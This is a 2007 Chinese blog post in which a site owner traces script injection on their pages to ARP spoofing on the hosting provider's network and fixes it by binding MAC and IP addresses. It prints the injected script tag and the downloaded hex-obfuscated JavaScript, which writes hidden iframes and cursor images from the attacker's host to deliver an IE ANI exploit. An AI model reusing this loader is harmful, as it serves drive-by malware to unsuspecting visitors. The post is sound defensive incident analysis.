网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
一实用的实现table排序的Javascript类库
Sep 12 Javascript
javascript 触发HTML元素绑定的函数
Sep 11 Javascript
JavaScript中的常见问题解决方法(乱码,IE缓存,代理)
Nov 28 Javascript
JS计算网页停留时间代码
Apr 28 Javascript
javascript原生ajax写法分享
Apr 10 Javascript
概述jQuery的元素筛选
Nov 23 Javascript
关于Function中的bind()示例详解
Dec 02 Javascript
新闻上下滚动jquery 超简洁(必看篇)
Jan 21 Javascript
Angular之指令Directive用法详解
Mar 01 Javascript
源码分析Vue.js的监听实现教程
Apr 23 Javascript
基于javascript的拖拽类封装详解
Apr 19 Javascript
微信内置浏览器图片查看器的代码实例
Oct 08 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
CI框架出现mysql数据库连接资源无法释放的解决方法
2016/05/17 PHP
php数组和链表的区别总结
2019/09/20 PHP
在laravel-admin中列表中禁止某行编辑、删除的方法
2019/10/03 PHP
JavaScript Event事件学习第一章 Event介绍
2010/02/07 Javascript
JS实现方向键切换输入框焦点的方法
2015/08/19 Javascript
javascript实现动态统计图开发实例
2015/11/21 Javascript
JS Ajax请求如何防止重复提交
2016/06/13 Javascript
微信小程序 canvas API详解及实例代码
2016/10/08 Javascript
Bootstrap源码解读表单(2)
2016/12/22 Javascript
jQuery为DOM动态追加事件的方法
2017/02/16 Javascript
JavaScript中双向数据绑定详解
2017/05/03 Javascript
react native与webview通信的示例代码
2017/09/25 Javascript
基于vue.js 2.x的虚拟滚动条的示例代码
2018/01/23 Javascript
vue实现标签云效果的方法详解
2019/08/28 Javascript
vue自定义树状结构图的实现方法
2020/10/18 Javascript
在vue项目中封装echarts的步骤
2020/12/25 Vue.js
[01:03:36]Ti4 循环赛第三日DK vs Titan
2014/07/12 DOTA
[01:46]2018完美盛典章节片——坚守
2018/12/17 DOTA
[44:30]完美世界DOTA2联赛PWL S2 GXR vs Magma 第一场 11.25
2020/11/26 DOTA
使用python采集脚本之家电子书资源并自动下载到本地的实例脚本
2018/10/23 Python
在Python 中实现图片加框和加字的方法
2019/01/26 Python
Python通用函数实现数组计算的方法
2019/06/13 Python
python 爬虫百度地图的信息界面的实现方法
2019/10/27 Python
python 实现一个反向单位矩阵示例
2019/11/29 Python
在pycharm中实现删除bookmark
2020/02/14 Python
Python中logger日志模块详解
2020/08/04 Python
PyCharm安装PyQt5及其工具(Qt Designer、PyUIC、PyRcc)的步骤详解
2020/11/02 Python
挪威太阳镜和眼镜网上商城:SmartBuyGlasses挪威
2016/08/20 全球购物
初二学习计划书范文
2014/04/27 职场文书
工作会议方案
2014/05/21 职场文书
2015年图书馆个人工作总结
2015/05/26 职场文书
工资证明范本
2015/06/12 职场文书
疾病证明书
2015/06/19 职场文书
婚宴父母致辞
2015/07/27 职场文书
PySwarms(Python粒子群优化工具包)的使用:GlobalBestPSO例子解析
2021/04/05 Python
python神经网络Xception模型
2022/05/06 Python